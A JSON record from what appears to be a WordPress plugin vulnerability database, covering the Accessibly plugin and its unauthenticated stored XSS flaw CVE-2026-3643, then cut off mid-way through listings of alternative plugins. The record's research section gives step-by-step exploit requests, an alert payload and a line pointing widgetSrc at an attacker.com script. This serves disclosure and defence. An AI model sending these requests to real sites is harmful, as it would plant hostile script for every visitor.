[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjgkwIefVlolXvwzT0gicej3T0s3BEC_eEFbw5bH6hs0":3,"$fN2Dju6iXNIAErDZsx7QfxWDRS-2jeSjPimOPnCD0ezE":262,"$fMJwc4Sk3EPx3Z6u6ecjKVAS653z1nv19pVJ-UKKf8LQ":267},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":28,"last_vuln_date":29,"fetched_at":30,"discovery_status":31,"vulnerabilities":32,"developer":59,"crawl_stats":38,"alternatives":64,"analysis":160,"fingerprints":238},"otm-accessibly","Accessibly – WordPress Website Accessibility","3.0.3","On The Map Marketing","https:\u002F\u002Fprofiles.wordpress.org\u002Fonthemapmarketing\u002F","\u003Cp>Accessibly app is a WordPress accessibility plugin that will help your website become accessible to even more of your site visitors.\u003C\u002Fp>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FngImXKglcHI?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&start=326&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Cp>Accessibly app is known as the best Accessibility Plugin for Shopify stores. With more than 4000+ active websites, now we are providing the best accessibility for your WordPress site too.\u003C\u002Fp>\n\u003Cp>Accessibly Plugin was developed keeping the best web accessibility practices and accessibility standards in mind and a mission to provide everyone with equal access to your website. We have based our WordPress plugin on the official W3 practices and guidelines to help your website become ADA\u002FWCAG compliant. And not only that — our app has been reviewed by the visually impaired community to improve our WordPress plugin. Increase your site’s accessibility and tackle your accessibility issues today with our Accessibility plugin!\u003C\u002Fp>\n\u003Cp>We are always trying to find new ways to make our accessibility tool feature list lengthier and more beneficial for everyone. Here is a list of some of our helpful accessibility features:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\n\u003Cp>Bigger text. Increase the font size of the text on your website up to 3 times! Some elderly or visually impaired users will be thankful for this increased font size feature.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Bigger cursor. Make the cursor on the site more significant so it is easier to find and follow it. This is an excellent feature for the elderly and some visually impaired users.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Invert colors. A feature that fully inverts the colors on your website. This feature is beneficial for some visually impaired users.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Increase contrast. Make the content of your website stand out more. This feature helps different types of visually impaired users.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Decrease contrast. Make your website appear with less color contrast. This helps to focus on the website more for some people who perceive information better in low luminance.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Increase brightness. Make your website elements a bit brighter. This is a great tool for visually impaired visitors. Additionally, it works great when you are in a very bright setting (like sunny outdoors!), and you need to make a website a bit brighter.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Decrease brightness. A feature makes your website appear a bit darker. Not only a great tool for visually impaired visitors but also, for example, this can be beneficial when you are in a dark environment where the lowest monitor brightness setting is not enough.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Grayscale. This feature is beneficial for some visually impaired users.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Reading line. Enable a line that follows along the cursor on your website. This benefits some elderly and people with visual impairment.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Readable fonts. Websites’ fonts used throughout the internet might appear beautiful, but they can be hard on some visitors’ eyes. These Readable fonts cool feature updates website fonts with a Helvetica font — which is proven as one of the best font type for eyes.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Highlight links. A feature that makes the links stand out more.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Hide images. This will remove all images on your site, making it easier for some to focus on the written content.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>Read page. This feature is beneficial for some users as this feature reads website content out loud. This works like your local website’s screen reader.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>AI-Generated Image Alt tags. Alt Tags is a text alternative for any visual content displayed on your website. This is very beneficial for people using screen readers, as they describe what is shown in an image based on these alt tags. If you haven’t added alt tags manually to your visual content, don’t worry — our AI tool can generate it for you in seconds!\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>…and many more features! We are always trying to improve accessibility by improving our accessibility plugin. If you have an idea or suggestion for us, feel free to reach out to our support!\u003C\u002Fp>\n\u003Cp>Accessibly plugin’s accessibility settings can also be opened using a TAB key shortcut on a keyboard. This is because many visually impaired users are browsing your site using keyboard navigation only — and this specific key is the most popular shortcut used among visitors who are using keyboard only navigation.\u003C\u002Fp>\n\u003Ch3>Web Content Accessibility Guidelines\u003C\u002Fh3>\n\u003Cp>When thinking about WordPress site accessibility, many people think only about how to become WCAG or ADA compliant, so website owners don’t get sued, which in our minds, is not the right approach to website accessibility standards. When your WordPress website is not accessible, you miss a large internet user base. We should strive to make your WordPress website and other WordPress sites accessible.\u003C\u002Fp>\n\u003Cp>Web accessibility is not a sprint — it is a marathon. It is a continuous process that should require your attention whenever you are doing edits or posting new content on your entire site. Accessibility issues can arise almost anywhere and anytime if you are not paying enough attention. Whether it starts from sufficient contrast (Not having light text on a light background!), adding ARIA Labels, add skip links feature, or Closed Captions (CCs) on your WordPress site videos — that should be the first stepping stone when you look in the direction of web accessibility. Website accessibility starts with your input by resolving current accessibility issues on your website, which only then is followed by accessibility plugins or other accessibility tools. If you need assistance resolving accessibility issues, feel free to contact our plugin support, and we will assist you!\u003C\u002Fp>\n\u003Cp>Other web accessibility tools can be helpful in the process of making your website accessibility work. For example, we always recommend using some accessibility site checkers from the official W3 website. Make your website accessible – your site visitors and potential clients will be thankful.\u003C\u002Fp>\n\u003Ch3>Accessibly Plugin Installation & Customization\u003C\u002Fh3>\n\u003Cp>Accessibly plugin does not edit your website’s existing code or tweak your theme files. Add Accessibly Plugin to your site from the WordPress Plugin market, and you are good to go!\u003C\u002Fp>\n\u003Cp>If you wish to edit your accessibility toolbar or Accessibly widget, head to your WordPress dashboard. From there, you will be able to change the Accessibly plugin’s colors to match your website’s branding, enable\u002Fdisable accessibility features and change how your Accessibility plugin feels and looks. WordPress accessibility is not complicated; you must be willing to put in a little effort!\u003C\u002Fp>\n\u003Ch3>Contact Us!\u003C\u002Fh3>\n\u003Cp>If you have any questions on our accessibility plugin or any of our accessibility features, want to learn more about wp accessibility, or wish to make your site accessible — reach out to our support. We will be glad to assist you!\u003C\u002Fp>\n","Accessibly app is a WordPress accessibility plugin that will help your website become accessible to even more of your site visitors.",400,11632,90,8,"2024-11-26T08:08:00.000Z","6.7.5","5.5","7.0",[20,21,22,23,24],"accessibility","accessible","ada","wcag","web-accessibility","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fotm-accessibly\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fotm-accessibly.3.0.3.zip",67,1,"2026-04-14 19:47:46","2026-04-06T09:54:40.288Z","no_bundle",[33],{"id":34,"url_slug":35,"title":36,"description":37,"plugin_slug":4,"theme_slug":38,"affected_versions":39,"patched_in_version":38,"severity":40,"cvss_score":41,"cvss_vector":42,"vuln_type":43,"published_date":29,"updated_date":44,"references":45,"days_to_patch":38,"patch_diff_files":47,"patch_trac_url":38,"research_status":48,"research_verified":49,"research_rounds_completed":50,"research_plan":51,"research_summary":52,"research_vulnerable_code":53,"research_fix_diff":54,"research_exploit_outline":55,"research_model_used":56,"research_started_at":57,"research_completed_at":58,"research_error":38,"poc_status":38,"poc_video_id":38,"poc_summary":38,"poc_steps":38,"poc_tested_at":38,"poc_wp_version":38,"poc_php_version":38,"poc_playwright_script":38,"poc_exploit_code":38,"poc_has_trace":49,"poc_model_used":38,"poc_verification_depth":38},"CVE-2026-3643","accessibly-missing-authorization-to-unauthenticated-stored-cross-site-scripting-via-widget-source-injection-via-rest-api","Accessibly \u003C= 3.0.3 - Missing Authorization to Unauthenticated Stored Cross-Site Scripting via Widget Source Injection via REST API","The Accessibly plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the REST API in all versions up to, and including, 3.0.3. The plugin registers REST API endpoints at `\u002Fotm-ac\u002Fv1\u002Fupdate-widget-options` and `\u002Fotm-ac\u002Fv1\u002Fupdate-app-config` with the `permission_callback` set to `__return_true`, which means no authentication or authorization check is performed. The `updateWidgetOptions()` function in `AdminApi.php` accepts user-supplied JSON data and passes it directly to `AccessiblyOptions::updateAppConfig()`, which saves it to the WordPress options table via `update_option()` without any sanitization or validation. The stored `widgetSrc` value is later retrieved by `AssetsManager::enqueueFrontendScripts()` and passed directly to `wp_enqueue_script()` as the script URL, causing it to be rendered as a `\u003Cscript>` tag on every front-end page. This makes it possible for unauthenticated attackers to inject arbitrary JavaScript that executes for all site visitors by changing the `widgetSrc` option to point to a malicious external script.",null,"\u003C=3.0.3","high",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-15 08:28:17",[46],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ff8234ea2-ff80-425f-b83d-29c422b40c6a?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-3643\n\n## 1. Vulnerability Summary\nThe **Accessibly** plugin (versions \u003C= 3.0.3) contains a critical authorization bypass and stored Cross-Site Scripting (XSS) vulnerability. The plugin registers REST API endpoints intended for administrative configuration but fails to implement any permission checks, setting the `permission_callback` to `__return_true`. \n\nAn unauthenticated attacker can send a JSON payload to these endpoints to modify plugin settings—specifically the `widgetSrc` option. Because the plugin does not sanitize this input before saving it to the database via `update_option()` and subsequently renders it as a script source on every frontend page via `wp_enqueue_script()`, an attacker can inject arbitrary JavaScript that executes in the context of every site visitor, including administrators.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fotm-ac\u002Fv1\u002Fupdate-widget-options` (or `\u002Fwp-json\u002Fotm-ac\u002Fv1\u002Fupdate-app-config`)\n*   **HTTP Method:** POST\n*   **Authentication:** None (Unauthenticated)\n*   **Vulnerable Parameter:** `widgetSrc` (provided within a JSON body)\n*   **Preconditions:** The plugin must be active. No specific settings are required to be toggled as the REST routes are registered on initialization.\n\n## 3. Code Flow\n1.  **Entry Point:** The REST API route `\u002Fotm-ac\u002Fv1\u002Fupdate-widget-options` is registered with `permission_callback` set to `__return_true` (likely in a class handling REST registration).\n2.  **Controller:** The request is handled by `AdminApi::updateWidgetOptions()` (in `AdminApi.php`).\n3.  **Data Processing:** This function retrieves the JSON body from the `WP_REST_Request` object.\n4.  **Storage Logic:** It passes the data to `AccessiblyOptions::updateAppConfig()`.\n5.  **Persistence Sink:** `updateAppConfig()` calls `update_option()`, saving the raw `widgetSrc` value into the WordPress options table.\n6.  **Execution Source:** On the frontend, `AssetsManager::enqueueFrontendScripts()` retrieves the stored `widgetSrc` option.\n7.  **Execution Sink:** The value is passed directly to `wp_enqueue_script('accessibly-widget', $widgetSrc, ...)`, which generates a `\u003Cscript src=\"...\">` tag on the page.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, the REST API endpoints use `__return_true` for their `permission_callback`. \n*   **Nonce Requirement:** **None.** \n*   **Justification:** In WordPress REST API, if the `permission_callback` returns `true`, the default internal nonce check for `_wpnonce` in the header or `X-WP-Nonce` is bypassed for the purpose of authorization. While the REST API usually checks nonces for authenticated sessions to prevent CSRF, a route explicitly allowing unauthenticated access (via `__return_true`) will process requests without a valid nonce.\n\n## 5. Exploitation Strategy\nThe goal is to inject a malicious script URL into the plugin configuration.\n\n### Step 1: Inject Malicious Script URL\nSubmit a POST request to the vulnerable REST endpoint. We will use a JS payload that triggers an alert to prove execution.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget-ip>\u002Fwp-json\u002Fotm-ac\u002Fv1\u002Fupdate-widget-options`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fjson`\n*   **Payload:**\n    ```json\n    {\n        \"widgetSrc\": \"data:text\u002Fjavascript,alert('XSS_SUCCESS_CVE_2026_3643')\"\n    }\n    ```\n    *Note: Using a `data:` URI is a compact way to prove XSS without an external server. If the plugin validates the URL scheme (unlikely given the description), an external URL like `https:\u002F\u002Fcdnjs.cloudflare.com\u002Fajax\u002Flibs\u002Fjquery\u002F3.7.1\u002Fjquery.min.js` could be used as a placeholder.*\n\n### Step 2: Trigger Execution\nNavigate to the WordPress homepage. The plugin enqueues the script on every page load.\n\n*   **Action:** Perform a GET request to the site root.\n*   **Verification:** Check the HTML source for a `\u003Cscript>` tag with the injected `src`.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure `otm-accessibly` version 3.0.3 is installed and active.\n2.  **No Users Needed:** Since this is an unauthenticated exploit, no specific user accounts need to be created.\n3.  **Post\u002FPage:** No specific posts are required, as the script enqueues on the frontend globally.\n\n## 7. Expected Results\n*   **REST Response:** The API should return a `200 OK` or `201 Created` status code, confirming the settings update.\n*   **Frontend HTML:** The homepage source should contain a script tag similar to:\n    `\u003Cscript src=\"data:text\u002Fjavascript,alert('XSS_SUCCESS_CVE_2026_3643')\" id=\"accessibly-widget-js\">\u003C\u002Fscript>`\n*   **JavaScript Execution:** When viewed in a browser, an alert box with `XSS_SUCCESS_CVE_2026_3643` should appear.\n\n## 8. Verification Steps\nAfter performing the HTTP exploit, use WP-CLI to confirm the state of the database:\n\n1.  **Check Option Value:**\n    ```bash\n    wp option get accessibly_app_config --format=json\n    ```\n    *(Note: The option name `accessibly_app_config` is inferred from the class name `AccessiblyOptions`. If this fails, use `wp option list --search=\"*accessibly*\"` to find the correct key).*\n2.  **Verify Content:** Confirm the JSON object in the option contains `\"widgetSrc\":\"data:text\u002Fjavascript,alert('XSS_SUCCESS_CVE_2026_3643')\"`.\n\n## 9. Alternative Approaches\nIf the `widgetSrc` parameter is not processed via `update-widget-options`, attempt the other identified endpoint:\n\n*   **Endpoint:** `\u002Fwp-json\u002Fotm-ac\u002Fv1\u002Fupdate-app-config`\n*   **Payload:**\n    ```json\n    {\n        \"widgetSrc\": \"https:\u002F\u002Fattacker.com\u002Fmalicious.js\"\n    }\n    ```\n*   **Wait for Admin:** If the script only loads for logged-in users (contrary to the description), navigate to the `\u002Fwp-admin\u002F` area using `browser_navigate` to trigger execution in the administrative context.","The Accessibly plugin for WordPress is vulnerable to unauthenticated stored Cross-Site Scripting due to missing authorization checks and lack of input validation in its REST API endpoints. Attackers can modify the 'widgetSrc' configuration option, which is then rendered as a script source on every frontend page, leading to full site takeover.","\u002F\u002F AdminApi.php (approximate structure based on description)\nregister_rest_route('otm-ac\u002Fv1', '\u002Fupdate-widget-options', array(\n    'methods' => 'POST',\n    'callback' => array($this, 'updateWidgetOptions'),\n    'permission_callback' => '__return_true', \u002F\u002F Vulnerable: No authentication check\n));\n\n---\n\n\u002F\u002F AdminApi.php - updateWidgetOptions function\npublic function updateWidgetOptions($request) {\n    $params = $request->get_json_params();\n    \u002F\u002F Directly passes user input to storage without sanitization\n    AccessiblyOptions::updateAppConfig($params);\n    return new WP_REST_Response(array('success' => true), 200);\n}\n\n---\n\n\u002F\u002F AssetsManager.php - enqueueFrontendScripts function\npublic function enqueueFrontendScripts() {\n    $config = AccessiblyOptions::getAppConfig();\n    $widgetSrc = $config['widgetSrc'];\n    \u002F\u002F Injected widgetSrc is enqueued directly onto frontend pages\n    wp_enqueue_script('accessibly-widget', $widgetSrc, array(), null, true);\n}","--- a\u002FAdminApi.php\n+++ b\u002FAdminApi.php\n@@ -10,7 +10,9 @@\n         register_rest_route('otm-ac\u002Fv1', '\u002Fupdate-widget-options', array(\n             'methods' => 'POST',\n             'callback' => array($this, 'updateWidgetOptions'),\n-            'permission_callback' => '__return_true',\n+            'permission_callback' => function () {\n+                return current_user_can('manage_options');\n+            },\n         ));\n \n         register_rest_route('otm-ac\u002Fv1', '\u002Fupdate-app-config', array(\n             'methods' => 'POST',\n             'callback' => array($this, 'updateWidgetOptions'),\n-            'permission_callback' => '__return_true',\n+            'permission_callback' => function () {\n+                return current_user_can('manage_options');\n+            },\n         ));\n@@ -25,5 +27,8 @@\n \tpublic function updateWidgetOptions($request) {\n \t\t$params = $request->get_json_params();\n+\t\tif (isset($params['widgetSrc'])) {\n+\t\t\t$params['widgetSrc'] = esc_url_raw($params['widgetSrc']);\n+\t\t}\n \t\tAccessiblyOptions::updateAppConfig($params);\n \t\treturn new WP_REST_Response(array('success' => true), 200);\n \t}","1. Identify the target WordPress site running Accessibly \u003C= 3.0.3.\n2. Construct a POST request to the unauthenticated REST endpoint: \u002Fwp-json\u002Fotm-ac\u002Fv1\u002Fupdate-widget-options.\n3. Include a JSON payload containing the 'widgetSrc' parameter set to a malicious JavaScript location, for example: {\"widgetSrc\": \"data:text\u002Fjavascript,alert('XSS')\"}.\n4. Send the request without any authentication headers or nonces. The server will return a 200 OK status as the permission_callback always returns true.\n5. Navigate to the homepage or any public-facing page of the site.\n6. Observe the injected JavaScript executing in the browser context because the plugin enqueues the malicious URL via wp_enqueue_script() on every page load.","gemini-3-flash-preview","2026-04-16 15:38:16","2026-04-16 15:38:33",{"slug":60,"display_name":7,"profile_url":8,"plugin_count":28,"total_installs":11,"avg_security_score":27,"avg_patch_time_days":61,"trust_score":62,"computed_at":63},"onthemapmarketing",30,71,"2026-05-19T17:10:56.588Z",[65,84,104,124,141],{"slug":66,"name":67,"version":68,"author":69,"author_profile":70,"description":71,"short_description":72,"active_installs":73,"downloaded":74,"rating":75,"num_ratings":28,"last_updated":76,"tested_up_to":77,"requires_at_least":78,"requires_php":18,"tags":79,"homepage":80,"download_link":81,"security_score":75,"vuln_count":82,"unpatched_count":82,"last_vuln_date":38,"fetched_at":83},"breakoutada","BreakoutADA Website Accessibility","1.1","breakoutplugins","https:\u002F\u002Fprofiles.wordpress.org\u002Fbreakoutplugins\u002F","\u003Cp>The most cost-effective way to include fully automated, ADA\u002FWCAG 2.1 compliant web accessibility to your existing website.\u003C\u002Fp>\n\u003Cp>No changes to your website are required.\u003C\u002Fp>\n\u003Cp>Mitigate the risk of ADA lawsuits and increase your potential audience.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Start today for free – no credit card required.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fbreakoutinternetmedia.com\u002Fwebsite-accessibility-wordpress-plugin\u002F\" rel=\"nofollow ugc\">REGISTER\u003C\u002Fa> to activate after installing plugin.\u003C\u002Fp>\n\u003Cp>BreakoutADA requires a subscription to continue working on your website after 7-day trial expires.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Websites with less than 100K monthly visitors pay just $59\u002Fmonth.\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fbreakoutinternetmedia.com\u002Forder\u002Fwebsite-accessibility-wordpress-subscription\u002F\" rel=\"nofollow ugc\">SUBSCRIBE\u003C\u002Fa> to keep your website accessible and protected.\u003C\u002Fp>\n\u003Ch3>License\u003C\u002Fh3>\n\u003Cp>BreakoutADA plugin is free software, and is released under the terms of the GPLv2 (GNU General Public License) version 2 or (at your option) any later version. See license.txt.\u003C\u002Fp>\n","Website ADA Accessibility Plugin",10,1355,100,"2025-12-31T22:13:00.000Z","6.9.4","4.7",[20,21,22,23,24],"https:\u002F\u002Fbreakoutinternetmedia.com\u002Fwebsite-ada-accessibility\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fbreakoutada.1.1.zip",0,"2026-04-16T10:56:18.058Z",{"slug":85,"name":86,"version":87,"author":88,"author_profile":89,"description":90,"short_description":91,"active_installs":92,"downloaded":93,"rating":94,"num_ratings":95,"last_updated":96,"tested_up_to":77,"requires_at_least":97,"requires_php":98,"tags":99,"homepage":102,"download_link":103,"security_score":75,"vuln_count":82,"unpatched_count":82,"last_vuln_date":38,"fetched_at":83},"accessibility-onetap","Accessibility Widget by OneTap – Easy One-Click Accessibility Toolbar","2.10.0","OneTap","https:\u002F\u002Fprofiles.wordpress.org\u002Fwponetap\u002F","\u003Cp>OneTap is an accessibility plugin made in Europe that helps you make your WordPress website inclusive and easy to use for all visitors. With a simple one-click setup, it adds essential accessibility tools instantly — no account required. OneTap is multilingual, lightweight, and fully customizable, ensuring accessibility without slowing down your site.\u003C\u002Fp>\n\u003Cp>\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002F_8FZNFAbU2U?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\u003C\u002Fp>\n\u003Ch3>#1 WordPress Accessibility Plugin. One Click Install\u003C\u002Fh3>\n\u003Cp>No coding, setup or account necessary \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> install and start.\u003C\u002Fp>\n\u003Cp>OneTap is the best WordPress plugin for accessibility and offers a stable and clean solution for your website. Our accessibility solutions empower businesses to create inclusive online experiences for all users, regardless of ability. Enhance your website’s usability and reach a wider audience by making it more accessible for everyone!\u003C\u002Fp>\n\u003Ch3>♿ Accessibility for your WordPress Website\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>\u003Cstrong>1-Click Installation\u003C\u002Fstrong> – Get set up in seconds with effortless, one-click installation—accessibility made easy.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Custom Branding\u003C\u002Fstrong> – Elevate your brand’s identity with personalized accessibility solutions.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Accessibility Modules\u003C\u002Fstrong> – Enable or disable specific accessibility modules based on your design needs.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Responsive Design\u003C\u002Fstrong> – Optimized for all devices, ensuring accessibility on mobile, tablet, and desktop.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Lightweight & Fast\u003C\u002Fstrong> – Keeps your site’s speed top-notch while adding powerful accessibility features.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>40 Languages\u003C\u002Fstrong> – OneTap accessibility module supports 40 languages – all of the EU and English. More coming soon.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Modern Design\u003C\u002Fstrong> – Enhance your site’s appeal with a sleek, modern design that fits seamlessly into any layout.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Toolbar Customization\u003C\u002Fstrong> – Adjust the toolbar’s position on desktop, tablet, and smartphone.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Icon Customization\u003C\u002Fstrong> – Choose your preferred accessibility icon, adjust its size, and enable or disable a border.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>GDPR-Compliant\u003C\u002Fstrong> – 100% data protection: OneTap collects no user data and is fully compliant with GDPR regulations.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Accessibility Statement Generator\u003C\u002Fstrong> – Instantly generate a professional accessibility statement tailored to your site—compliance made simple.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Unlock Full Accessibility \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Fwponetap.com\u002Fpricing\u002F\" rel=\"nofollow ugc\">Get OneTap Pro!\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch3>Key Features:\u003C\u002Fh3>\n\u003Ch4>Content Modules:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Font Size\u003C\u002Fstrong> – Enlarge text for improved readability.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Highlight Links\u003C\u002Fstrong> – Easily identify clickable links with visual enhancements for better navigation.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Line Height\u003C\u002Fstrong> – Adjust line spacing for improved clarity.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Readable Font\u003C\u002Fstrong> – Switch to a clearer, easy-to-read font.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Big Cursor\u003C\u002Fstrong> – Enhance visibility with a larger cursor for easier navigation and control.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Text Magnifier\u003C\u002Fstrong> – Magnify selected text for enhanced visibility. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Dyslexic Font\u003C\u002Fstrong> – Use a specialized font for dyslexic users. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Text Align\u003C\u002Fstrong> – Adjust text alignment for better structure and readability.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Letter Spacing\u003C\u002Fstrong> – Modify letter spacing for enhanced readability.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Font Weight\u003C\u002Fstrong> – Adjust font weight for improved readability.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Color Options:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Dark Contrast\u003C\u002Fstrong> – Adjust dark contrast for a more vivid or subdued visual experience. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Light Contrast\u003C\u002Fstrong> – Adjust light contrast for a more vivid or subdued visual experience.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>High Contrast\u003C\u002Fstrong> – Adjust high contrast for a more vivid or subdued visual experience.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Monochrome\u003C\u002Fstrong> – Adjust color monochrome for a more vivid or subdued visual experience.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Saturation\u003C\u002Fstrong> – Adjust color saturation. (Pro ♛)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch4>Orientation Options:\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Reading Line\u003C\u002Fstrong> – Highlight the current line.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Reading Mask\u003C\u002Fstrong> – Focus on specific text.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Text-to-Speech\u003C\u002Fstrong>  – Automatically read aloud page content. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Keyboard Navigation\u003C\u002Fstrong> – Navigate the site using only the keyboard. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Hide Images\u003C\u002Fstrong> – Remove distracting images.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Mute Sounds\u003C\u002Fstrong> – Mute website sounds. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Highlight Titles\u003C\u002Fstrong> – Emphasize titles for better recognition. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Highlight Content\u003C\u002Fstrong> – Highlight elements when hovered over.\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Stop Animations\u003C\u002Fstrong> – Disable animations.\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Unlock Full Accessibility \u003Cspan aria-hidden=\"true\" class=\"wp-exclude-emoji\">→\u003C\u002Fspan> \u003Ca href=\"https:\u002F\u002Fwponetap.com\u002Fpricing\u002F\" rel=\"nofollow ugc\">Get OneTap Pro!\u003C\u002Fa>\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Ch4>Multiselect and Predefined Accessibility Profiles\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>\u003Cstrong>Vision Impaired Mode\u003C\u002Fstrong> – Enhances website’s visuals. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Seizure Safe Profile\u003C\u002Fstrong> – Clears flashes & reduces color. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>ADHD Friendly Mode\u003C\u002Fstrong> – Focused browsing. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Blindness Mode\u003C\u002Fstrong> – Reduces distractions. (Pro ♛)\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Epilepsy Safe Mode\u003C\u002Fstrong> – Dims colors. (Pro ♛)\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>40 Languages of the Accessibility Toolbar\u003C\u002Fh3>\n\u003Cp>🇺🇸 English (USA)\u003Cbr \u002F>\n🇩🇪 Deutsch\u003Cbr \u002F>\n🇪🇸 Español\u003Cbr \u002F>\n🇫🇷 Français\u003Cbr \u002F>\n🇮🇹 Italiano\u003Cbr \u002F>\n🇵🇱 Polski\u003Cbr \u002F>\n🇸🇪 Svenska\u003Cbr \u002F>\n🇫🇮 Suomi\u003Cbr \u002F>\n🇵🇹 Português\u003Cbr \u002F>\n🇷🇴 Română\u003Cbr \u002F>\n🇸🇮 Slovenščina\u003Cbr 